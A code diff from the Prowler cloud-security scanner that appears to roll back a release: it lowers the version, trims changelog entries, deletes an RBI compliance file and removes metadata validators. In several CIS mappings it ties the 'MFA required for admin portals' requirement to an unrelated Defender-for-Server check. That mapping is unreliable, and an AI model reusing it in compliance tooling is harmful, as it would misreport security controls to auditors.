+botocore = ">=1.37.4,<2.0a0"

 [package.extras]
-crt = ["botocore[crt] (>=1.37.4,<2.0a.0)"]
+crt = ["botocore[crt] (>=1.37.4,<2.0a0)"]

 [[package]]
 name = "safety"
@@ -6500,7 +6520,7 @@ version = "1.17.2"
 description = "Module for decorators, wrappers and monkey patching."
 optional = false
 python-versions = ">=3.8"
-groups = ["dev"]
+groups = ["main", "dev"]
 files = [
    {file = "wrapt-1.17.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:3d57c572081fed831ad2d26fd430d565b76aa277ed1d30ff4d40670b1c0dd984"},
    {file = "wrapt-1.17.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:b5e251054542ae57ac7f3fba5d10bfff615b6c2fb09abeb37d2f1463f841ae22"},
@@ -6886,4 +6906,4 @@ files = [
 [metadata]
 lock-version = "2.1"
 python-versions = ">3.9.1,<3.13"
-content-hash = "fa67f98ae1b75ec5a54d1d6a1c33c5412d888ec60cf35fc407606dc48329c0bf"
+content-hash = "386f6cf2bed49290cc4661aa2093ceb018aa6cdaf6864bdfab36f6c2c50e241e"
@@ -2,53 +2,16 @@

 All notable changes to the **Prowler SDK** are documented in this file.

-## [5.21.0] (Prowler v5.21.0)
+## [5.20.0] (Prowler UNRELEASED)

 ### 🚀 Added

- `misconfig` scanner as default for Image provider scans [(#10167)](https://github.com/prowler-cloud/prowler/pull/10167)
- `entra_conditional_access_policy_device_code_flow_blocked` check for M365 provider [(#10218)](https://github.com/prowler-cloud/prowler/pull/10218)
- RBI compliance for the Azure provider [(#10339)](https://github.com/prowler-cloud/prowler/pull/10339)
-`entra_conditional_access_policy_require_mfa_for_admin_portals` check for Azure provider and update CIS compliance [(#10330)](https://github.com/prowler-cloud/prowler/pull/10330)
- CheckMetadata Pydantic validators [(#8583)](https://github.com/prowler-cloud/prowler/pull/8583)
- `organization_repository_deletion_limited` check for GitHub provider [(#10185)](https://github.com/prowler-cloud/prowler/pull/10185)
- SecNumCloud 3.2 for the GCP provider [(#10364)](https://github.com/prowler-cloud/prowler/pull/10364)
- SecNumCloud 3.2 for the Azure provider [(#10358)](https://github.com/prowler-cloud/prowler/pull/10358)
- SecNumCloud 3.2 for the Alibaba Cloud provider [(#10370)](https://github.com/prowler-cloud/prowler/pull/10370)
- SecNumCloud 3.2 for the Oracle Cloud provider [(#10371)](https://github.com/prowler-cloud/prowler/pull/10371)
-
-### 🔄 Changed
-
- Bump `pygithub` from 2.5.0 to 2.8.0 to use native Organization properties
- Update M365 SharePoint service metadata to new format [(#9684)](https://github.com/prowler-cloud/prowler/pull/9684)
- Update M365 Exchange service metadata to new format [(#9683)](https://github.com/prowler-cloud/prowler/pull/9683)
- Update M365 Teams service metadata to new format [(#9685)](https://github.com/prowler-cloud/prowler/pull/9685)
- Update M365 Entra ID service metadata to new format [(#9682)](https://github.com/prowler-cloud/prowler/pull/9682)
- Update ResourceType and Categories for Azure Entra ID service metadata [(#10334)](https://github.com/prowler-cloud/prowler/pull/10334)
- Update OCI Regions to include US DoD regions [(#10375)](https://github.com/prowler-cloud/prowler/pull/10376)
-
-### 🐞 Fixed
-
- Route53 dangling IP check false positive when using `--region` flag [(#9952)](https://github.com/prowler-cloud/prowler/pull/9952)
- RBI compliance framework support on Prowler Dashboard for the Azure provider [(#10360)](https://github.com/prowler-cloud/prowler/pull/10360)
- CheckMetadata strict validators rejecting valid external tool provider data (image, iac, llm) [(#10363)](https://github.com/prowler-cloud/prowler/pull/10363)
-
-### 🔐 Security
-
- Bump `multipart` to 1.3.1 to fix [GHSA-p2m9-wcp5-6qw3](https://github.com/defnull/multipart/security/advisories/GHSA-p2m9-wcp5-6qw3) [(#10331)](https://github.com/prowler-cloud/prowler/pull/10331)
-
---
-
-## [5.20.0] (Prowler v5.20.0)
-
-### 🚀 Added
-
- `entra_conditional_access_policy_approved_client_app_required_for_mobile` check for M365 provider [(#10216)](https://github.com/prowler-cloud/prowler/pull/10216)
+- `entra_conditional_access_policy_approved_client_app_required_for_mobile` check for m365 provider [(#10216)](https://github.com/prowler-cloud/prowler/pull/10216)
 - `entra_conditional_access_policy_compliant_device_hybrid_joined_device_mfa_required` check for M365 provider [(#10197)](https://github.com/prowler-cloud/prowler/pull/10197)
- `trusted_ips` configurable option for `opensearch_service_domains_not_publicly_accessible` check to reduce false positives on IP-restricted policies [(#8631)](https://github.com/prowler-cloud/prowler/pull/8631)
+- Add `trusted_ips` configurable option to `opensearch_service_domains_not_publicly_accessible` check to reduce false positives on IP-restricted policies [(#8631)](https://github.com/prowler-cloud/prowler/pull/8631)
 - `guardduty_delegated_admin_enabled_all_regions` check for AWS provider [(#9867)](https://github.com/prowler-cloud/prowler/pull/9867)
 - OpenStack object storage service with 7 checks [(#10258)](https://github.com/prowler-cloud/prowler/pull/10258)
- AWS Organizations OU metadata (OU ID, OU path) in ASFF, OCSF and CSV outputs [(#10283)](https://github.com/prowler-cloud/prowler/pull/10283)
+- Add AWS Organizations OU metadata (OU ID, OU path) to ASFF, OCSF and CSV outputs [(#10283)](https://github.com/prowler-cloud/prowler/pull/10283)

 ### 🔄 Changed

@@ -752,7 +752,7 @@
      "Id": "2.2.8",
      "Description": "Ensure Multi-factor Authentication is Required to access Microsoft Admin Portals",
      "Checks": [
-        "entra_conditional_access_policy_require_mfa_for_admin_portals"
+        "defender_ensure_defender_for_server_is_on"
      ],
      "Attributes": [
        {
@@ -1036,7 +1036,7 @@
      "Id": "6.2.7",
      "Description": "Ensure that multifactor authentication is required to access Microsoft Admin Portals",
      "Checks": [
-        "entra_conditional_access_policy_require_mfa_for_admin_portals"
+        "defender_ensure_defender_for_server_is_on"
      ],
      "Attributes": [
        {
@@ -472,7 +472,7 @@
      "Id": "5.2.7",
      "Description": "Ensure that multifactor authentication is required to access Microsoft Admin Portals",
      "Checks": [
-        "entra_conditional_access_policy_require_mfa_for_admin_portals"
+        "defender_ensure_defender_for_server_is_on"
      ],
      "Attributes": [
        {
@@ -63,7 +63,7 @@
      "Id": "1.1.4",
      "Description": "Ensure Multi-factor Authentication is Required to access Microsoft Admin Portals",
      "Checks": [
-        "entra_conditional_access_policy_require_mfa_for_admin_portals"
+        "defender_ensure_defender_for_server_is_on"
      ],
      "Attributes": [
        {
@@ -1,178 +0,0 @@
-{
-  "Framework": "RBI-Cyber-Security-Framework",
-  "Name": "Reserve Bank of India (RBI) Cyber Security Framework",
-  "Version": "",
-  "Provider": "GCP",
-  "Description": "The Reserve Bank had prescribed a set of baseline cyber security controls for primary (Urban) cooperative banks (UCBs) in October 2018. On further examination, it has been decided to prescribe a comprehensive cyber security framework for the UCBs, as a graded approach, based on their digital depth and interconnectedness with the payment systems landscape, digital products offered by them and assessment of cyber security risk. The framework would mandate implementation of progressively stronger security measures based on the nature, variety and scale of digital product offerings of banks.",
-  "Requirements": [
-    {
-      "Id": "annex_i_1_1",
-      "Name": "Annex I (1.1)",
-      "Description": "UCBs should maintain an up-to-date business IT Asset Inventory Register containing the following fields, as a minimum: a) Details of the IT Asset (viz., hardware/software/network devices, key personnel, services, etc.), b. Details of systems where customer data are stored, c. Associated business applications, if any, d. Criticality of the IT asset (For example, High/Medium/Low).",
-      "Attributes": [
-        {
-          "ItemId": "annex_i_1_1",
-          "Service": "gcp"
-        }
-      ],
-      "Checks": [
-        "iam_cloud_asset_inventory_enabled",
-        "iam_organization_essential_contacts_configured"
-      ]
-    },
-    {
-      "Id": "annex_i_1_3",
-      "Name": "Annex I (1.3)",
-      "Description": "Appropriately manage and provide protection within and outside UCB/network, keeping in mind how the data/information is stored, transmitted, processed, accessed and put to use within/outside the UCB's network, and level of risk they are exposed to depending on the sensitivity of the data/information.",
-      "Attributes": [
-        {
-          "ItemId": "annex_i_1_3",
-          "Service": "gcp"
-        }
-      ],
-      "Checks": [
-        "cloudstorage_bucket_public_access",
-        "cloudstorage_bucket_uniform_bucket_level_access",
-        "cloudstorage_bucket_logging_enabled",
-        "cloudstorage_bucket_versioning_enabled",
-        "cloudsql_instance_public_access",
-        "cloudsql_instance_public_ip",
-        "cloudsql_instance_ssl_connections",
-        "compute_instance_public_ip",
-        "compute_instance_encryption_with_csek_enabled",
-        "compute_image_not_publicly_shared",
-        "kms_key_rotation_enabled",
-        "kms_key_not_publicly_accessible",
-        "bigquery_dataset_public_access",
-        "bigquery_dataset_cmk_encryption"
-      ]
-    },
-    {
-      "Id": "annex_i_5_1",
-      "Name": "Annex I (5.1)",
-      "Description": "The firewall configurations should be set to the highest security level and evaluation of critical device (such as firewall, network switches, security devices, etc.) configurations should be done periodically.",
-      "Attributes": [
-        {
-          "ItemId": "annex_i_5_1",
-          "Service": "compute"
-        }
-      ],
-      "Checks": [
-        "compute_firewall_rdp_access_from_the_internet_allowed",
-        "compute_firewall_ssh_access_from_the_internet_allowed",
-        "compute_network_not_legacy",
-        "compute_network_default_in_use",
-        "compute_subnet_flow_logs_enabled",
-        "compute_network_dns_logging_enabled",
-        "dns_dnssec_disabled"
-      ]
-    },
-    {
-      "Id": "annex_i_6",
-      "Name": "Annex I (6)",
-      "Description": "Put in place systems and processes to identify, track, manage and monitor the status of patches to servers, operating system and application software running at the systems used by the UCB officials (end-users). Implement and update antivirus protection for all servers and applicable end points preferably through a centralised system.",
-      "Attributes": [
-        {
-          "ItemId": "annex_i_6",
-          "Service": "gcp"
-        }
-      ],
-      "Checks": [
-        "compute_instance_shielded_vm_enabled",
-        "compute_project_os_login_enabled",
-        "artifacts_container_analysis_enabled",
-        "gcr_container_scanning_enabled"
-      ]
-    },
-    {
-      "Id": "annex_i_7_1",
-      "Name": "Annex I (7.1)",
-      "Description": "Disallow administrative rights on end-user workstations/PCs/laptops and provide access rights on a 'need to know' and 'need to do' basis.",
-      "Attributes": [
-        {
-          "ItemId": "annex_i_7_1",
-          "Service": "iam"
-        }
-      ],
-      "Checks": [
-        "iam_sa_no_administrative_privileges",
-        "iam_no_service_roles_at_project_level",
-        "iam_role_sa_enforce_separation_of_duties",
-        "iam_role_kms_enforce_separation_of_duties",
-        "iam_sa_no_user_managed_keys",
-        "compute_instance_default_service_account_in_use",
-        "compute_instance_default_service_account_in_use_with_full_api_access"
-      ]
-    },
-    {
-      "Id": "annex_i_7_2",
-      "Name": "Annex I (7.2)",
-      "Description": "Passwords should be set as complex and lengthy and users should not use same passwords for all the applications/systems/devices.",
-      "Attributes": [
-        {
-          "ItemId": "annex_i_7_2",
-          "Service": "iam"
-        }
-      ],
-      "Checks": [
-        "compute_project_os_login_2fa_enabled",
-        "iam_account_access_approval_enabled"
-      ]
-    },
-    {
-      "Id": "annex_i_7_3",
-      "Name": "Annex I (7.3)",
-      "Description": "Remote Desktop Protocol (RDP) which allows others to access the computer remotely over a network or over the internet should be always disabled and should be enabled only with the approval of the authorised officer of the UCB. Logs for such remote access shall be enabled and monitored for suspicious activities.",
-      "Attributes": [
-        {
-          "ItemId": "annex_i_7_3",
-          "Service": "compute"
-        }
-      ],
-      "Checks": [
-        "compute_firewall_rdp_access_from_the_internet_allowed",
-        "compute_firewall_ssh_access_from_the_internet_allowed",
-        "compute_project_os_login_enabled"
-      ]
-    },
-    {
-      "Id": "annex_i_7_4",
-      "Name": "Annex I (7.4)",
-      "Description": "Implement appropriate (e.g. centralised) systems and controls to allow, manage, log and monitor privileged/super user/administrative access to critical systems (servers/databases, applications, network devices etc.)",
-      "Attributes": [
-        {
-          "ItemId": "annex_i_7_4",
-          "Service": "logging"
-        }
-      ],
-      "Checks": [
-        "iam_audit_logs_enabled",
-        "logging_sink_created",
-        "cloudstorage_audit_logs_enabled",
-        "compute_loadbalancer_logging_enabled",
-        "compute_subnet_flow_logs_enabled",
-        "logging_log_metric_filter_and_alert_for_project_ownership_changes_enabled",
-        "logging_log_metric_filter_and_alert_for_custom_role_changes_enabled",
-        "logging_log_metric_filter_and_alert_for_audit_configuration_changes_enabled"
-      ]
-    },
-    {
-      "Id": "annex_i_12",
-      "Name": "Annex I (12)",
-      "Description": "Take periodic back up of the important data and store this data 'off line' (i.e., transferring important files to a storage device that can be detached from a computer/system after copying all the files).",
-      "Attributes": [
-        {
-          "ItemId": "annex_i_12",
-          "Service": "gcp"
-        }
-      ],
-      "Checks": [
-        "cloudsql_instance_automated_backups",
-        "cloudstorage_bucket_versioning_enabled",
-        "cloudstorage_bucket_soft_delete_enabled",
-        "cloudstorage_bucket_lifecycle_management_enabled",
-        "compute_snapshot_not_outdated"
-      ]
-    }
-  ]
-}
@@ -499,9 +499,7 @@
    {
      "Id": "1.2.3",
      "Description": "Ensure only a limited number of trusted users can delete repositories.",
-      "Checks": [
-        "organization_repository_deletion_limited"
-      ],
+      "Checks": [],
      "Attributes": [
        {
          "Section": "1 Source Code",
@@ -1606,9 +1606,7 @@
    {
      "Id": "5.2.2.12",
      "Description": "The Microsoft identity platform supports the device authorization grant, which allows users to sign in to input-constrained devices such as a smart TV, IoT device, or a printer. Ensure the device code sign-in flow is blocked.",
-      "Checks": [
-        "entra_conditional_access_policy_device_code_flow_blocked"
-      ],
+      "Checks": [],
      "Attributes": [
        {
          "Section": "5 Microsoft Entra admin center",
@@ -243,7 +243,6 @@
        "entra_break_glass_account_fido2_security_key_registered",
        "entra_default_app_management_policy_enabled",
        "entra_all_apps_conditional_access_coverage",
-        "entra_conditional_access_policy_device_code_flow_blocked",
        "entra_legacy_authentication_blocked",
        "entra_managed_device_required_for_authentication",
        "entra_seamless_sso_disabled",
@@ -465,7 +464,6 @@
        "defender_malware_policy_common_attachments_filter_enabled",
        "defender_malware_policy_comprehensive_attachments_filter_applied",
        "defender_malware_policy_notifications_internal_users_malware_enabled",
-        "entra_conditional_access_policy_device_code_flow_blocked",
        "entra_identity_protection_sign_in_risk_enabled",
        "entra_identity_protection_user_risk_enabled",
        "entra_legacy_authentication_blocked",
@@ -696,9 +694,8 @@
        "entra_admin_users_mfa_enabled",
        "entra_admin_users_sign_in_frequency_enabled",
        "entra_all_apps_conditional_access_coverage",
-        "entra_break_glass_account_fido2_security_key_registered",
        "entra_conditional_access_policy_approved_client_app_required_for_mobile",
-        "entra_conditional_access_policy_device_code_flow_blocked",
+        "entra_break_glass_account_fido2_security_key_registered",
        "entra_identity_protection_sign_in_risk_enabled",
        "entra_managed_device_required_for_authentication",
        "entra_seamless_sso_disabled",
@@ -38,7 +38,7 @@ class _MutableTimestamp:

 timestamp = _MutableTimestamp(datetime.today())
 timestamp_utc = _MutableTimestamp(datetime.now(timezone.utc))
-prowler_version = "5.21.1"
+prowler_version = "5.20.0"
 html_logo_url = "https://github.com/prowler-cloud/prowler/"
 square_logo_img = "https://raw.githubusercontent.com/prowler-cloud/prowler/dc7d2d5aeb92fdf12e8604f42ef6472cd3e8e889/docs/img/prowler-logo-black.png"
 aws_logo = "https://user-images.githubusercontent.com/38561120/235953920-3e3fba08-0795-41dc-b480-9bea57db9f2e.png"
@@ -1,5 +1,4 @@
 import functools
-import json
 import os
 import re
 import sys
@@ -16,115 +15,6 @@ from prowler.lib.check.compliance_models import Compliance
 from prowler.lib.check.utils import recover_checks_from_provider
 from prowler.lib.logger import logger

-# Valid ResourceGroup values as defined in the RFC
-VALID_RESOURCE_GROUPS = frozenset(
-    {
-        "compute",
-        "container",
-        "serverless",
-        "database",
-        "storage",
-        "network",
-        "IAM",
-        "messaging",
-        "security",
-        "monitoring",
-        "api_gateway",
-        "ai_ml",
-        "governance",
-        "collaboration",
-        "devops",
-        "analytics",
-    }
-)
-
-# Valid Categories as defined in the RFC
-VALID_CATEGORIES = frozenset(
-    {
-        "encryption",
-        "internet-exposed",
-        "logging",
-        "secrets",
-        "resilience",
-        "threat-detection",
-        "trust-boundaries",
-        "vulnerabilities",
-        "cluster-security",
-        "container-security",
-        "node-security",
-        "gen-ai",
-        "ci-cd",
-        "identity-access",
-        "email-security",
-        "forensics-ready",
-        "software-supply-chain",
-        "e3",
-        "e5",
-        "privilege-escalation",
-        "ec2-imdsv1",
-    }
-)
-
-
-@functools.lru_cache(maxsize=1)
-def _load_aws_check_types_hierarchy() -> dict:
-    """
-    Load and cache the AWS CheckTypes hierarchy from the JSON config file.
-
-    Returns:
-        dict: The CheckTypes hierarchy, or empty dict if file not found.
-    """
-    try:
-        current_dir = os.path.dirname(os.path.abspath(__file__))
-        check_types_file = os.path.normpath(
-            os.path.join(
-                current_dir,
-                "..",
-                "..",
-                "providers",
-                "aws",
-                "config",
-                "check_types.json",
-            )
-        )
-
-        if not os.path.exists(check_types_file):
-            return {}
-
-        with open(check_types_file, "r") as f:
-            return json.load(f)
-
-    except (FileNotFoundError, json.JSONDecodeError):
-        return {}
-
-
-def _validate_aws_check_type_in_config(check_type: str) -> bool:
-    """
-    Validate if a CheckType exists in the AWS config using direct lookups.
-    Supports partial paths: namespace, namespace/category, namespace/category/classifier
-
-    Args:
-        check_type: The CheckType string to validate (e.g., "TTPs/Initial Access")
-
-    Returns:
-        bool: True if the CheckType path exists in the config hierarchy
-    """
-    if not check_type:
-        return False
-
-    hierarchy = _load_aws_check_types_hierarchy()
-    if not hierarchy:
-        return False
-
-    path_parts = check_type.split("/")
-    current_level = hierarchy
-    for part in path_parts:
-        if not isinstance(current_level, dict) or part not in current_level:
-            return False
-        current_level = current_level[part]
-
-    return True
-

 class Code(BaseModel):
    """
@@ -204,19 +94,11 @@ class CheckMetadata(BaseModel):
        Compliance (list, optional): The compliance information for the check. Defaults to None.

    Validators:
-        valid_category(value): Validator function to validate the categories of the check against predefined values.
+        valid_category(value): Validator function to validate the categories of the check.
        severity_to_lower(severity): Validator function to convert the severity to lowercase.
+        valid_severity(severity): Validator function to validate the severity of the check.
        valid_cli_command(remediation): Validator function to validate the CLI command is not an URL.
        valid_resource_type(resource_type): Validator function to validate the resource type is not empty.
-        validate_service_name(service_name, values): Validator function to validate the service name matches CheckID.
-        valid_check_id(check_id): Validator function to validate the CheckID format.
-        validate_check_title(check_title): Validator function to validate CheckTitle max length (150 chars) and not starting with 'Ensure'.
-        validate_related_url(related_url): Validator function to validate RelatedUrl is empty (deprecated field).
-        validate_recommendation_url(remediation): Validator function to validate Recommendation URL points to Prowler Hub.
-        validate_check_type(check_type, values): Validator function to validate CheckType - must be empty for non-AWS providers, no empty strings and predefined types validation for AWS.
-        validate_description(description): Validator function to validate Description max length (400 chars).
-        validate_risk(risk): Validator function to validate Risk max length (400 chars).
-        validate_resource_group(resource_group): Validator function to validate ResourceGroup against predefined values.
        validate_additional_urls(additional_urls): Validator function to ensure AdditionalURLs contains no duplicates.
    """

@@ -245,7 +127,7 @@ class CheckMetadata(BaseModel):
    Compliance: Optional[list[Any]] = Field(default_factory=list)

    @validator("Categories", each_item=True, pre=True, always=True)
-    def valid_category(cls, value, values):
+    def valid_category(value):
        if not isinstance(value, str):
            raise ValueError("Categories must be a list of strings")
        value_lower = value.lower()
@@ -253,13 +135,6 @@ class CheckMetadata(BaseModel):
            raise ValueError(
                f"Invalid category: {value}. Categories can only contain lowercase letters, numbers and hyphen '-'"
            )
-        if (
-            value_lower not in VALID_CATEGORIES
-            and values.get("Provider") not in EXTERNAL_TOOL_PROVIDERS
-        ):
-            raise ValueError(
-                f"Invalid category: '{value_lower}'. Must be one of: {', '.join(sorted(VALID_CATEGORIES))}."
-            )
        return value_lower

    @validator("Severity", pre=True, always=True)
@@ -308,90 +183,6 @@ class CheckMetadata(BaseModel):

        return check_id

-    @validator("CheckTitle", pre=True, always=True)
-    def validate_check_title(cls, check_title, values):
-        if values.get("Provider") not in EXTERNAL_TOOL_PROVIDERS:
-            if len(check_title) > 150:
-                raise ValueError(
-                    f"CheckTitle must not exceed 150 characters, got {len(check_title)} characters"
-                )
-            if check_title.startswith("Ensure"):
-                raise ValueError(
-                    "CheckTitle must not start with 'Ensure'. Use a descriptive title that focuses on the security state."
-                )
-        return check_title
-
-    @validator("RelatedUrl", pre=True, always=True)
-    def validate_related_url(cls, related_url, values):
-        if related_url and values.get("Provider") not in EXTERNAL_TOOL_PROVIDERS:
-            raise ValueError("RelatedUrl must be empty. This field is deprecated.")
-        return related_url
-
-    @validator("Remediation")
-    def validate_recommendation_url(cls, remediation, values):
-        if values.get("Provider") not in EXTERNAL_TOOL_PROVIDERS:
-            url = remediation.Recommendation.Url
-            if url and not url.startswith("https://hub.prowler.com/"):
-                raise ValueError(
-                    f"Remediation Recommendation URL must point to Prowler Hub (https://hub.prowler.com/...), got '{url}'."
-                )
-        return remediation
-
-    @validator("CheckType", pre=True, always=True)
-    def validate_check_type(cls, check_type, values):
-        provider = values.get("Provider", "").lower()
-
-        # Non-AWS providers must have an empty CheckType list
-        if provider != "aws" and provider not in EXTERNAL_TOOL_PROVIDERS:
-            if check_type:
-                raise ValueError(
-                    f"CheckType must be empty for non-AWS providers. Got {check_type} for provider '{provider}'."
-                )
-            return check_type
-
-        # Check for empty strings in the list - applies to AWS
-        for i, check_type_item in enumerate(check_type):
-            if not check_type_item or check_type_item.strip() == "":
-                raise ValueError(
-                    f"CheckType list cannot contain empty strings. Found empty string at index {i}."
-                )
-
-        # For AWS provider, validate against config hierarchy
-        if provider == "aws":
-            for check_type_item in check_type:
-                if not _validate_aws_check_type_in_config(check_type_item):
-                    raise ValueError(
-                        f"Invalid CheckType: '{check_type_item}'. Must be a valid path in the AWS CheckType hierarchy. See prowler/providers/aws/config/check_types.json for valid values."
-                    )
-
-        return check_type
-
-    @validator("Description", pre=True, always=True)
-    def validate_description(cls, description, values):
-        if values.get("Provider") not in EXTERNAL_TOOL_PROVIDERS:
-            if len(description) > 400:
-                raise ValueError(
-                    f"Description must not exceed 400 characters, got {len(description)} characters"
-                )
-        return description
-
-    @validator("Risk", pre=True, always=True)
-    def validate_risk(cls, risk, values):
-        if values.get("Provider") not in EXTERNAL_TOOL_PROVIDERS:
-            if len(risk) > 400:
-                raise ValueError(
-                    f"Risk must not exceed 400 characters, got {len(risk)} characters"
-                )
-        return risk
-
-    @validator("ResourceGroup", pre=True, always=True)
-    def validate_resource_group(cls, resource_group):
-        if resource_group and resource_group not in VALID_RESOURCE_GROUPS:
-            raise ValueError(
-                f"Invalid ResourceGroup: '{resource_group}'. Must be one of: {', '.join(sorted(VALID_RESOURCE_GROUPS))} or empty string."
-            )
-        return resource_group
-
    @validator("AdditionalURLs", pre=True, always=True)
    def validate_additional_urls(cls, additional_urls):
        if not isinstance(additional_urls, list):
--- a/Show More
+++ b/Show More